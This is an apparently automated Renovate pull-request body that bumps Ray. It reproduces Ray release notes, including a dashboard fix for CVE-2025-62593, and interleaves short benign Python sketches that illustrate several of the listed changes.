([#​57579](https://redirect.github.com/ray-project/ray/pull/57579))
- Owned object spill metrics
([#​57870](https://redirect.github.com/ray-project/ray/pull/57870))
- Monitoring in raylet for resource view
([#​58382](https://redirect.github.com/ray-project/ray/pull/58382))
- IPv6 support for sockets
([#​56147](https://redirect.github.com/ray-project/ray/pull/56147))
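For the "exponential backoff for retryable gRPCs" item above, the general technique is to wait progressively longer between retries of a failed call, up to a cap. The sketch below is a generic illustration with made-up parameter values and hypothetical function names, not Ray's gRPC client code; production clients typically also add random jitter so that many clients do not retry in lockstep.

```python
import time
from typing import Callable, Iterator, TypeVar

T = TypeVar("T")


def backoff_delays(base: float = 0.1, factor: float = 2.0,
                   max_delay: float = 5.0, attempts: int = 5) -> Iterator[float]:
    """Yield `attempts` delays: base, base*factor, base*factor**2, ... capped at max_delay."""
    delay = base
    for _ in range(attempts):
        yield min(delay, max_delay)
        delay *= factor


def call_with_retries(fn: Callable[[], T], is_retryable: Callable[[Exception], bool],
                      delays: Iterator[float],
                      sleep: Callable[[float], None] = time.sleep) -> T:
    """Call fn, sleeping between retryable failures; non-retryable errors propagate at once."""
    for delay in delays:
        try:
            return fn()
        except Exception as exc:
            if not is_retryable(exc):
                raise
            sleep(delay)
    return fn()  # final attempt; its exception, if any, propagates


# Usage: a call that fails twice with a transient error, then succeeds.
failures = [ConnectionError(), ConnectionError()]


def flaky() -> str:
    if failures:
        raise failures.pop()
    return "ok"


waits = []  # record the delays instead of actually sleeping
print(call_with_retries(flaky, lambda e: isinstance(e, ConnectionError),
                        backoff_delays(), sleep=waits.append))  # ok
print(waits)  # [0.1, 0.2]
```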
💫 Enhancements:
- Fault-tolerant RPCs: KillActor, CancelRemoteTask, NotifyGCSRestart,
and ReleaseUnusedBundles
([#57648](https://redirect.github.com/ray-project/ray/pull/57648), [#57945](https://redirect.github.com/ray-project/ray/pull/57945), [#57965](https://redirect.github.com/ray-project/ray/pull/57965))
- Use graceful actor shutdown when GCS polling detects actor ref deleted
([#​58605](https://redirect.github.com/ray-project/ray/pull/58605))
- Use graceful shutdown path when actor OUT\_OF\_SCOPE (del actor)
([#​57090](https://redirect.github.com/ray-project/ray/pull/57090))
- Improved actor kill logs
([#​58544](https://redirect.github.com/ray-project/ray/pull/58544))
- Scheduling detached actor with placement group not recommended
([#​57726](https://redirect.github.com/ray-project/ray/pull/57726))
- Better handling of detached actor restarts
([#​57931](https://redirect.github.com/ray-project/ray/pull/57931))
- Enhanced ray.get thread safety
([#​57911](https://redirect.github.com/ray-project/ray/pull/57911))
- Make concurrent `ray.get` requests for the same object thread-safe
([#​58606](https://redirect.github.com/ray-project/ray/pull/58606))
- Move request ID creation to the worker to address a plasma get performance regression
([#​58390](https://redirect.github.com/ray-project/ray/pull/58390))
- Make GlobalState lazy initialization thread-safe
([#​58182](https://redirect.github.com/ray-project/ray/pull/58182))
- Reporter agent can get PID via RPC to raylet
([#​57004](https://redirect.github.com/ray-project/ray/pull/57004))
- Add tee logging for subprocess exit codes in `ray start --block`
([#​57982](https://redirect.github.com/ray-project/ray/pull/57982))
- Add entrypoint log for jobs
([#​58300](https://redirect.github.com/ray-project/ray/pull/58300))
- Cleaner error message for exceeding the list actors limit
([#​58255](https://redirect.github.com/ray-project/ray/pull/58255))
- Clean up NODE\_DIED task error message
([#​58638](https://redirect.github.com/ray-project/ray/pull/58638))
- Improved histogram metrics midpoint calculation
([#​57948](https://redirect.github.com/ray-project/ray/pull/57948))
- Migrated from STATS to metric interface in RPC components
([#​57926](https://redirect.github.com/ray-project/ray/pull/57926))
- Remove STATS usage from the core worker component
([#​58060](https://redirect.github.com/ray-project/ray/pull/58060))
- Remove STATS usage from the object manager component
([#​57974](https://redirect.github.com/ray-project/ray/pull/57974))
- Improve scheduler\_placement\_time\_s metric
([#​58217](https://redirect.github.com/ray-project/ray/pull/58217))
- Refactor OpenTelemetry environment variable handling
([#​57910](https://redirect.github.com/ray-project/ray/pull/57910))
- Add option to disable OpenTelemetry SDK error logs
([#​58257](https://redirect.github.com/ray-project/ray/pull/58257))
- Improved cgroups support
([#​57776](https://redirect.github.com/ray-project/ray/pull/57776),[
#​57864](https://redirect.github.com/ray-project/ray/pull/57864),[
#​57731](https://redirect.github.com/ray-project/ray/pull/57731),[
#​58017](https://redirect.github.com/ray-project/ray/pull/58017),[
#​58028](https://redirect.github.com/ray-project/ray/pull/58028),[
#​58059](https://redirect.github.com/ray-project/ray/pull/58059),[
#​58064](https://redirect.github.com/ray-project/ray/pull/58064),[
#​58577](https://redirect.github.com/ray-project/ray/pull/58577))
- Use GetNodeAddressAndLiveness in raylet client pool
([#​58576](https://redirect.github.com/ray-project/ray/pull/58576))
- Ray Direct Transport improvements with NIXL integration
([#​57671](https://redirect.github.com/ray-project/ray/pull/57671),[
#​58550](https://redirect.github.com/ray-project/ray/pull/58550),[
#​58548](https://redirect.github.com/ray-project/ray/pull/58548),[
#​56783](https://redirect.github.com/ray-project/ray/pull/56783),[
#​58263](https://redirect.github.com/ray-project/ray/pull/58263))
- Fix symmetric-run
([#​58337](https://redirect.github.com/ray-project/ray/pull/58337))
- Make worker connection timeout parameters configurable
([#​58372](https://redirect.github.com/ray-project/ray/pull/58372))
- Define an environment variable for controlling uvloop
([#​58442](https://redirect.github.com/ray-project/ray/pull/58442))
- Allow 60 seconds for the dashboard to start
([#​58341](https://redirect.github.com/ray-project/ray/pull/58341))
- Report driver stats
([#​58045](https://redirect.github.com/ray-project/ray/pull/58045))
- Fix idle node termination on object pulling
([#​57928](https://redirect.github.com/ray-project/ray/pull/57928))
- Check whether temp\_dir is a subdirectory of the virtualenv to prevent virtualenv problems at runtime
([#​58084](https://redirect.github.com/ray-project/ray/pull/58084))
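A check like the one described above can be sketched with `pathlib`. This sketch assumes that "inside the virtualenv" means nested under `sys.prefix` of an active venv or modern virtualenv. The helper names are hypothetical, and this is not Ray's implementation.

```python
import sys
from pathlib import Path
from typing import Union

PathLike = Union[str, Path]


def in_virtualenv() -> bool:
    """True when running inside a venv or a modern (20+) virtualenv."""
    # Both tools point sys.prefix at the environment, while sys.base_prefix
    # keeps pointing at the base Python installation.
    return sys.prefix != sys.base_prefix


def is_inside(path: PathLike, root: PathLike) -> bool:
    """True if `path` equals `root` or is nested under it, after resolving symlinks."""
    # Path.is_relative_to requires Python 3.9+; resolve() also works for paths
    # that don't exist yet.
    return Path(path).resolve().is_relative_to(Path(root).resolve())


def temp_dir_inside_active_venv(temp_dir: PathLike) -> bool:
    """Hypothetical helper: flag a temp dir that lives inside the active virtualenv."""
    return in_virtualenv() and is_inside(temp_dir, sys.prefix)


# Usage
print(temp_dir_inside_active_venv(Path(sys.prefix) / "tmp" / "ray"))
```

Resolving both paths before comparing them prevents a symlinked temp directory (for example `/tmp` to `/private/tmp` on macOS) from slipping past the check.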
🔨 Fixes:
- Fixed use-after-free in RayletClient
([#​58747](https://redirect.github.com/ray-project/ray/pull/58747))
- Fixed deadlock when cancelling stale requests on in-order actors
([#​57746](https://redirect.github.com/ray-project/ray/pull/57746))
- Fixed "RayEventRecorder::StartExportingEvents() should be called only
once" error
([#​57917](https://redirect.github.com/ray-project/ray/pull/57917))
- Fixed raylet shutdown races
([#​57198](https://redirect.github.com/ray-project/ray/pull/57198))
- Fixed incorrect usage of gRPC streaming API in ray syncer
([#​58307](https://redirect.github.com/ray-project/ray/pull/58307))
- Fixed log monitor seeking bug after log rotation
([#​56902](https://redirect.github.com/ray-project/ray/pull/56902))
- Fixed idempotency issues in RequestWorkerLease for scheduled leases
([#​58265](https://redirect.github.com/ray-project/ray/pull/58265))
- Fixed a `RAY_CHECK(inserted)` failure inside the reference counter
([#​58092](https://redirect.github.com/ray-project/ray/pull/58092))
- Fixed static type hints for ActorClass when setting options
([#​58439](https://redirect.github.com/ray-project/ray/pull/58439))
- Fixed exception type for accelerator ID visibility check
([#​58269](https://redirect.github.com/ray-project/ray/pull/58269))
- Fixed transport type handling in DAG node initialization
([#​57987](https://redirect.github.com/ray-project/ray/pull/57987))
- Fixed RAY\_NODE\_TYPE\_NAME handling when autoscaler is in read-only
mode
([#​58460](https://redirect.github.com/ray-project/ray/pull/58460))
- Ensure client\_call\_manager\_ outlives metrics\_agent\_client\_ in
core worker
([#​58315](https://redirect.github.com/ray-project/ray/pull/58315))
- Fixed header validation in dashboard tests
([#​58648](https://redirect.github.com/ray-project/ray/pull/58648))
- Fixed Ray-on-Spark-on-YARN mode validation so that the mode can run
([#​58335](https://redirect.github.com/ray-project/ray/pull/58335))
📖 Documentation:
- Fix pattern\_async\_actor demo typo
([#​58486](https://redirect.github.com/ray-project/ray/pull/58486))
- Add documentation on RDT limitations
([#​58063](https://redirect.github.com/ray-project/ray/pull/58063))
- Add actor, job, and node events to the Ray event export documentation
([#​57930](https://redirect.github.com/ray-project/ray/pull/57930))
- Remove implementation details from get\_runtime\_context docstring
([#​58212](https://redirect.github.com/ray-project/ray/pull/58212))
- Improved monitoring section with links
([#​58472](https://redirect.github.com/ray-project/ray/pull/58472))
🏗 Architecture:
- Refactor ActorInfoAccessor in gcs\_client to be mockable
([#​57241](https://redirect.github.com/ray-project/ray/pull/57241))
- Refactor reference\_counter out of memory store and plasma store
([#​57590](https://redirect.github.com/ray-project/ray/pull/57590))
- Replace the reference counter mock with the real reference counter in tests
([#​57178](https://redirect.github.com/ray-project/ray/pull/57178))
- Split raylet cython file into multiple files
([#​56575](https://redirect.github.com/ray-project/ray/pull/56575))
- Move ray\_syncer to top level directory
([#​58316](https://redirect.github.com/ray-project/ray/pull/58316))
- Move python\_callbacks to common
([#​57909](https://redirect.github.com/ray-project/ray/pull/57909))
- Consolidate find\_free\_port to network\_utils
([#​58304](https://redirect.github.com/ray-project/ray/pull/58304))
- Implement event merge logic at export time
([#​58070](https://redirect.github.com/ray-project/ray/pull/58070))
- Feature flag for enabling Ray event export
([#​57999](https://redirect.github.com/ray-project/ray/pull/57999))
- Add comments explaining ray\_syncer\_ channels in Raylet
([#​58342](https://redirect.github.com/ray-project/ray/pull/58342))
- Integration tests for task event generation
([#​57636](https://redirect.github.com/ray-project/ray/pull/57636))
##### Dashboard
💫 Enhancements:
- Added percentage usage graphs for resources
([#​57549](https://redirect.github.com/ray-project/ray/pull/57549))
- Sub-tabs with full Grafana dashboard embeds on Metrics tab
([#​57561](https://redirect.github.com/ray-project/ray/pull/57561))
- Added queued blocks to operator panels
([#​57739](https://redirect.github.com/ray-project/ray/pull/57739))
- Improved operator metrics logging
([#​57702](https://redirect.github.com/ray-project/ray/pull/57702))
- Make do\_reply accept status\_code instead of success bool
([#​58384](https://redirect.github.com/ray-project/ray/pull/58384))
- Reject requests that carry browser fetch headers
([#​58553](https://redirect.github.com/ray-project/ray/pull/58553))
🔨 Fixes:
- Fixed broken Ray Data per node metrics due to unsupported operator
filter
([#​57970](https://redirect.github.com/ray-project/ray/pull/57970))
- Filtered out ANSI escape codes from logs
([#​53370](https://redirect.github.com/ray-project/ray/pull/53370))
📖 Documentation:
- Expose the dashboard URL when deploying on YARN using Skein
([#​57793](https://redirect.github.com/ray-project/ray/pull/57793))
##### Autoscaler + KubeRay
🎉 New Features:
- KubeRay autoscaling support with top-level Resources and Labels fields
([#​57260](https://redirect.github.com/ray-project/ray/pull/57260))
- Bundle label selector support in request\_resources SDK
([#​54843](https://redirect.github.com/ray-project/ray/pull/54843))
💫 Enhancements:
- Azure VM launcher release test
([#​57921](https://redirect.github.com/ray-project/ray/pull/57921))
- Azure CLI added to base-extra image
([#​58012](https://redirect.github.com/ray-project/ray/pull/58012))
📖 Documentation:
- Label selector guide
([#​58157](https://redirect.github.com/ray-project/ray/pull/58157))
- Add minimum version requirement on kai-scheduler
([#​58161](https://redirect.github.com/ray-project/ray/pull/58161))
- Mention RayJob gang scheduling for YuniKorn
([#​58375](https://redirect.github.com/ray-project/ray/pull/58375))
- Add Volcano RayJob gang scheduling example
([#​58320](https://redirect.github.com/ray-project/ray/pull/58320))
- Add KAI scheduler integration documentation
([#​54857](https://redirect.github.com/ray-project/ray/pull/54857))
- KubeRay sidecar mode
([#​58273](https://redirect.github.com/ray-project/ray/pull/58273))
- Update RayJob documentation with new DeletionStrategy
([#​58306](https://redirect.github.com/ray-project/ray/pull/58306))
- Add guidance for RayService initialization timeout
([#​58238](https://redirect.github.com/ray-project/ray/pull/58238))
- Update version to 1.5.0
([#​58452](https://redirect.github.com/ray-project/ray/pull/58452))
- Add output example of CLI commands
([#​58078](https://redirect.github.com/ray-project/ray/pull/58078))
- Fix invalid syntax in label\_selector
([#​58352](https://redirect.github.com/ray-project/ray/pull/58352))
Thank You to all the Contributors!
[@​marosset](https://redirect.github.com/marosset),
[@​curiosity-hyf](https://redirect.github.com/curiosity-hyf),
[@​bveeramani](https://redirect.github.com/bveeramani),
[@​Future-Outlier](https://redirect.github.com/Future-Outlier),
[@​saihaj](https://redirect.github.com/saihaj),
[@​ZacAttack](https://redirect.github.com/ZacAttack),
[@​ArthurBook](https://redirect.github.com/ArthurBook),
[@​crypdick](https://redirect.github.com/crypdick),
[@​Aydin-ab](https://redirect.github.com/Aydin-ab),
[@​elliot-barn](https://redirect.github.com/elliot-barn),
[@​Kunchd](https://redirect.github.com/Kunchd),
[@​justinvyu](https://redirect.github.com/justinvyu),
[@​jjyao](https://redirect.github.com/jjyao),
[@​gangsf](https://redirect.github.com/gangsf),
[@​sunsetxh](https://redirect.github.com/sunsetxh),
[@​Daraan](https://redirect.github.com/Daraan),
[@​justinyeh1995](https://redirect.github.com/justinyeh1995),
[@​MatthewCWeston](https://redirect.github.com/MatthewCWeston),
[@​kyuds](https://redirect.github.com/kyuds),
[@​daiping8](https://redirect.github.com/daiping8),
[@​sauravvenkat](https://redirect.github.com/sauravvenkat),
[@​omatthew98](https://redirect.github.com/omatthew98),
[@​CowKeyMan](https://redirect.github.com/CowKeyMan),
[@​morotti](https://redirect.github.com/morotti),
[@​israbbani](https://redirect.github.com/israbbani),
[@​goutamvenkat-anyscale](https://redirect.github.com/goutamvenkat-anyscale),
[@​fscnick](https://redirect.github.com/fscnick),
[@​Zakelly](https://redirect.github.com/Zakelly),
[@​xyuzh](https://redirect.github.com/xyuzh),
[@​kouroshHakha](https://redirect.github.com/kouroshHakha),
[@​owenowenisme](https://redirect.github.com/owenowenisme),
[@​Qiaolin-Yu](https://redirect.github.com/Qiaolin-Yu),
[@​czgdp1807](https://redirect.github.com/czgdp1807),
[@​shen-shanshan](https://redirect.github.com/shen-shanshan),
[@​wph95](https://redirect.github.com/wph95),
[@​iamjustinhsu](https://redirect.github.com/iamjustinhsu),
[@​MengjinYan](https://redirect.github.com/MengjinYan),
[@​jugalshah291](https://redirect.github.com/jugalshah291),
[@​Yicheng-Lu-llll](https://redirect.github.com/Yicheng-Lu-llll),
[@​ryanaoleary](https://redirect.github.com/ryanaoleary),
[@​nadongjun](https://redirect.github.com/nadongjun),
[@​xinyuangui2](https://redirect.github.com/xinyuangui2),
[@​ideal](https://redirect.github.com/ideal),
[@​my-vegetable-has-exploded](https://redirect.github.com/my-vegetable-has-exploded),
[@​lucaschadwicklam97](https://redirect.github.com/lucaschadwicklam97),
[@​tianyi-ge](https://redirect.github.com/tianyi-ge),
[@​ahao-anyscale](https://redirect.github.com/ahao-anyscale),
[@​abrarsheikh](https://redirect.github.com/abrarsheikh),
[@​Blaze-DSP](https://redirect.github.com/Blaze-DSP),
[@​rueian](https://redirect.github.com/rueian),
[@​thomasdesr](https://redirect.github.com/thomasdesr),
[@​CaiZhanqi](https://redirect.github.com/CaiZhanqi),
[@​harshit-anyscale](https://redirect.github.com/harshit-anyscale),
[@​jeffreyjeffreywang](https://redirect.github.com/jeffreyjeffreywang),
[@​TimothySeah](https://redirect.github.com/TimothySeah),
[@​codope](https://redirect.github.com/codope),
[@​sampan-s-nayak](https://redirect.github.com/sampan-s-nayak),
[@​andrewsykim](https://redirect.github.com/andrewsykim),
[@​xingsuo-zbz](https://redirect.github.com/xingsuo-zbz),
[@​aslonnie](https://redirect.github.com/aslonnie),
[@​OneSizeFitsQuorum](https://redirect.github.com/OneSizeFitsQuorum),
[@​ryankert01](https://redirect.github.com/ryankert01),
[@​Sparks0219](https://redirect.github.com/Sparks0219),
[@​soffer-anyscale](https://redirect.github.com/soffer-anyscale),
[@​akyang-anyscale](https://redirect.github.com/akyang-anyscale),
[@​alanwguo](https://redirect.github.com/alanwguo),
[@​chrisfellowes-anyscale](https://redirect.github.com/chrisfellowes-anyscale),
[@​richo-anyscale](https://redirect.github.com/richo-anyscale),
[@​alexeykudinkin](https://redirect.github.com/alexeykudinkin),
[@​JasonLi1909](https://redirect.github.com/JasonLi1909),
[@​ruisearch42](https://redirect.github.com/ruisearch42),
[@​EkinKarabulut](https://redirect.github.com/EkinKarabulut),
[@​MarcoGorelli](https://redirect.github.com/MarcoGorelli),
[@​SolitaryThinker](https://redirect.github.com/SolitaryThinker),
[@​srinathk10](https://redirect.github.com/srinathk10),
[@​dayshah](https://redirect.github.com/dayshah),
[@​richardliaw](https://redirect.github.com/richardliaw),
[@​pseudo-rnd-thoughts](https://redirect.github.com/pseudo-rnd-thoughts),
[@​win5923](https://redirect.github.com/win5923),
[@​axreldable](https://redirect.github.com/axreldable),
[@​matthewdeng](https://redirect.github.com/matthewdeng),
[@​ArturNiederfahrenhorst](https://redirect.github.com/ArturNiederfahrenhorst),
[@​can-anyscale](https://redirect.github.com/can-anyscale),
[@​khluu](https://redirect.github.com/khluu),
[@​landscapepainter](https://redirect.github.com/landscapepainter),
[@​kevin85421](https://redirect.github.com/kevin85421),
[@​seanlaii](https://redirect.github.com/seanlaii),
[@​edoakes](https://redirect.github.com/edoakes),
[@​nrghosh](https://redirect.github.com/nrghosh),
[@​eicherseiji](https://redirect.github.com/eicherseiji),
[@​Artimislyy](https://redirect.github.com/Artimislyy),
[@​cem-anyscale](https://redirect.github.com/cem-anyscale),
[@​coqian](https://redirect.github.com/coqian),
[@​chiayi](https://redirect.github.com/chiayi),
[@​liulehui](https://redirect.github.com/liulehui)
### [`v2.51.2`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.51.2)
[Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.51.1...ray-2.51.2)
- Fix for CVE-2025-62593: reject `Sec-Fetch-*` and other browser-specific headers in the dashboard's browser rejection logic
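The idea behind this fix can be sketched as a header check. The previous check relied on `User-Agent` starting with "Mozilla", but Firefox and Safari let page scripts override that header through `fetch()`. By contrast, the Fetch standard treats header names beginning with `Sec-` as forbidden request headers, so page scripts can neither set nor remove them. The function names, the prefix list, and the 403 response below are assumptions. The sketch leaves out the release note's "other browser-specific headers", and it is not Ray's dashboard code.

```python
from collections.abc import Mapping

# Assumption: illustrative prefix list only, not Ray's actual rejection list.
BROWSER_HEADER_PREFIXES = ("sec-fetch-",)


def is_browser_request(headers: Mapping[str, str]) -> bool:
    """Return True if the request looks like it came from a web browser."""
    lowered = {name.lower(): value for name, value in headers.items()}
    # Legacy signal: scripts in Firefox and Safari can override User-Agent
    # through fetch(), so this check alone is not sufficient.
    if lowered.get("user-agent", "").startswith("Mozilla"):
        return True
    # Fetch Metadata headers use the forbidden "Sec-" prefix, so only the
    # browser itself can attach them; a script cannot strip them.
    return any(name.startswith(BROWSER_HEADER_PREFIXES) for name in lowered)


def guard(headers: Mapping[str, str]) -> int:
    """Return a hypothetical HTTP status: 403 for browser requests, 200 otherwise."""
    return 403 if is_browser_request(headers) else 200


# Usage: a spoofed User-Agent no longer hides the request's browser origin.
print(guard({"User-Agent": "curl/8.5.0", "Sec-Fetch-Site": "same-origin"}))  # prints 403
```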
### [`v2.51.1`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.51.1)
[Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.51.0...ray-2.51.1)
- Reuse previous metadata if transferring the same tensor list with
`nixl`
([#​58309](https://redirect.github.com/ray-project/ray/pull/58309))
### [`v2.51.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.51.0)
[Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.50.1...ray-2.51.0)
##### Release Highlights
**Ray Train:**
- Ray Train v2 is now enabled by default! Ray Train v2 provides
usability and stability improvements, as well as new features. For more
details, see the
[REP](https://redirect.github.com/ray-project/enhancements/blob/main/reps/2024-10-18-train-tune-api-revamp/2024-10-18-train-tune-api-revamp.md)
and [Migration
Guide](https://redirect.github.com/ray-project/ray/issues/49454). To
disable Ray Train v2, set the environment variable
`RAY_TRAIN_V2_ENABLED=0`.
**Ray Serve:**
- Application-level autoscaling: Introduces custom autoscaling policies
that operate across all deployments in an application, enabling
coordinated scaling decisions based on aggregate metrics. This is a
significant advancement over per-deployment autoscaling, allowing for
more intelligent resource management at the application level.
- Enhanced autoscaling capabilities with replica-level metrics: Wires up
`AutoscalingContext` with `total_running_requests`,
`total_queued_requests`, and `total_num_requests`, plus adds support for
min, max, and time-weighted average aggregation functions. These
improvements give users fine-grained control to implement sophisticated
custom autoscaling policies based on real-time workload metrics.
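A time-weighted average can differ noticeably from a plain mean when metric samples arrive at uneven intervals. The framework-independent sketch below assumes that each `(timestamp, value)` sample holds until the next one arrives. The registry and function names are hypothetical, and this is not the `AutoscalingContext` API.

```python
from typing import Callable, Dict, List, Tuple

Sample = Tuple[float, float]  # (timestamp in seconds, metric value)


def time_weighted_average(samples: List[Sample], end: float) -> float:
    """Average a step-shaped metric over [first timestamp, end].

    Each sample's value holds until the next sample's timestamp, and the last
    one holds until `end`. Samples must be sorted by timestamp.
    """
    if not samples:
        raise ValueError("need at least one sample")
    start = samples[0][0]
    if end <= start:
        return samples[-1][1]  # zero-length window: fall back to the latest value
    boundaries = [t for t, _ in samples[1:]] + [end]
    area = sum(value * (t_next - t) for (t, value), t_next in zip(samples, boundaries))
    return area / (end - start)


# Hypothetical registry mirroring the min / max / time-weighted average options.
AGGREGATORS: Dict[str, Callable[[List[Sample], float], float]] = {
    "min": lambda samples, end: min(v for _, v in samples),
    "max": lambda samples, end: max(v for _, v in samples),
    "time_weighted_avg": time_weighted_average,
}

# Usage: 2 running requests for 1 s, then 4 for 2 s, then 0 for 1 s.
samples = [(0.0, 2.0), (1.0, 4.0), (3.0, 0.0)]
for name, agg in AGGREGATORS.items():
    print(name, agg(samples, 4.0))
# prints: min 0.0 / max 4.0 / time_weighted_avg 2.5
```

A plain mean of the same three samples would give 2.0. The time-weighted result (2.5) gives more weight to the value that persisted longest.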
##### Ray Libraries
##### Ray Data
🎉 New Features:
- Added enhanced support for Unity Catalog integration
([#​57954](https://redirect.github.com/ray-project/ray/issues/57954),
[#​58049](https://redirect.github.com/ray-project/ray/issues/58049))
- New expression evaluator infrastructure for improved query
optimization
([#​57778](https://redirect.github.com/ray-project/ray/issues/57778),
[#​57855](https://redirect.github.com/ray-project/ray/issues/57855))
- Support for SaveMode in write operations
([#​57946](https://redirect.github.com/ray-project/ray/issues/57946))
- Added approximate quantile aggregator
([#​57598](https://redirect.github.com/ray-project/ray/issues/57598))
- MCAP datasource support for robotics data
([#​55716](https://redirect.github.com/ray-project/ray/issues/55716))
- Callback-based stat computation for preprocessors and ValueCounter
([#​56848](https://redirect.github.com/ray-project/ray/issues/56848))
- Support for multiple download URIs with improved error handling
([#​57775](https://redirect.github.com/ray-project/ray/issues/57775))
💫 Enhancements:
- Improved projection pushdown handling with renamed columns
([#​58033](https://redirect.github.com/ray-project/ray/issues/58033),
[#​58037](https://redirect.github.com/ray-project/ray/issues/58037),
[#​58040](https://redirect.github.com/ray-project/ray/issues/58040),
[#​58071](https://redirect.github.com/ray-project/ray/issues/58071))
- Enhanced hash-shuffle performance with better retry policies
([#​57572](https://redirect.github.com/ray-project/ray/issues/57572))
- Streamlined concurrency parameter semantics
([#​57035](https://redirect.github.com/ray-project/ray/issues/57035))
- Improved execution progress rendering
([#​56992](https://redirect.github.com/ray-project/ray/issues/56992))
- Better handling of empty columns in pandas blocks
([#​57740](https://redirect.github.com/ray-project/ray/issues/57740))
- Enhanced support for complex data types and column operations
([#​57271](https://redirect.github.com/ray-project/ray/issues/57271))
- Reduced memory usage with improved streaming generator backpressure
([#​57688](https://redirect.github.com/ray-project/ray/issues/57688))
- Enhanced preemption testing and utilities
([#​57883](https://redirect.github.com/ray-project/ray/issues/57883))
- Improved Download operator display names
([#​57773](https://redirect.github.com/ray-project/ray/issues/57773))
- Better handling of variable-shaped tensors and tensor columns
([#​57240](https://redirect.github.com/ray-project/ray/issues/57240))
- Optimized aggregator execution with out-of-order processing by default
([#​57753](https://redirect.github.com/ray-project/ray/issues/57753))
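Pushing a projection below a rename requires translating the selected output column names back to their source names before reading, which is where the renamed-column handling above matters. The following library-independent sketch represents a rename as an `{original: new}` dict. The function name and this representation are assumptions, not Ray Data internals.

```python
from typing import Dict, Iterable, List


def source_columns_for_projection(projected: Iterable[str], renames: Dict[str, str]) -> List[str]:
    """Translate columns selected after a rename into the columns to read from the source.

    `renames` maps original name -> new name, as in a rename step that runs
    before the projection.
    """
    inverse = {new: old for old, new in renames.items()}
    sources = []
    for col in projected:
        if col in inverse:
            sources.append(inverse[col])  # produced by a rename: read the original
        elif col in renames:
            # The original name was renamed away, so it no longer exists.
            raise KeyError(f"column {col!r} was renamed to {renames[col]!r}")
        else:
            sources.append(col)  # untouched column: same name on both sides
    return sources


print(source_columns_for_projection(["id", "price_usd"], {"price": "price_usd"}))
# prints ['id', 'price']
```

Building the inverse map handles swaps correctly: with `{"a": "b", "b": "a"}`, selecting `a` reads source column `b`.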
🔨 Fixes:
- Fixed renamed columns so that they are correctly dropped from the output
([#​58040](https://redirect.github.com/ray-project/ray/issues/58040),
[#​58071](https://redirect.github.com/ray-project/ray/issues/58071))
- Fixed handling of renames in projection pushdown
([#​58033](https://redirect.github.com/ray-project/ray/issues/58033),
[#​58037](https://redirect.github.com/ray-project/ray/issues/58037))
- Fixed vLLMEngineStage field name inconsistency for images
([#​57980](https://redirect.github.com/ray-project/ray/issues/57980))
- Fixed driver hang during streaming generator block metadata retrieval
([#​56451](https://redirect.github.com/ray-project/ray/issues/56451))
- Fixed retry policy for hash-shuffle tasks
([#​57572](https://redirect.github.com/ray-project/ray/issues/57572))
- Fixed prefetch loop to avoid blocking on fetches
([#​57613](https://redirect.github.com/ray-project/ray/issues/57613))
- Fixed empty projection handling
([#​57740](https://redirect.github.com/ray-project/ray/issues/57740))
- Fixed errors with concatenation of mixed pyarrow native and extension
types
([#​56811](https://redirect.github.com/ray-project/ray/issues/56811))
📖 Documentation:
- Updated document embedding benchmark to use canonical Ray Data API
([#​57977](https://redirect.github.com/ray-project/ray/issues/57977))
- Improved concurrency-related documentation
([#​57658](https://redirect.github.com/ray-project/ray/issues/57658))
- Updated preprocessing and data handling examples
##### Ray Train
🎉 New Features:
- Turn on Train v2 by default
([#​57857](https://redirect.github.com/ray-project/ray/issues/57857))
- Top-level `ray.train` aliases for public APIs
([#​57758](https://redirect.github.com/ray-project/ray/issues/57758))
💫 Enhancements:
- Raise clear errors when mixing v1/v2 APIs
([#​57570](https://redirect.github.com/ray-project/ray/issues/57570))
- JAX backend: add `jax.distributed.shutdown()` for `JaxBackend`
([#​57802](https://redirect.github.com/ray-project/ray/issues/57802))
- Update `TrainingFailedError` module (
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/vortex-data/vortex).
---------
Signed-off-by: Adam Gutglick <adam@spiraldb.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Adam Gutglick <adam@spiraldb.com>